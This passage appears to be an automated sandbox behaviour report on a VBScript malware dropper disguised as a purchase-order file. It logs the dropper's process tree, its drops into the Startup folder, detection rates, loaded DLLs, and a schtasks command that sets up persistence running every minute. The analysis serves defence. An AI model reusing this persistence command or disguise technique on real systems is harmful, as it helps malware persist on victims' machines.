                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
                                Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: Purchase Order Summary Details.vbs Virustotal: Detection: 46%
                                Source: Purchase Order Summary Details.vbs ReversingLabs: Detection: 31%
                                Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
                                Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: acgenral.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
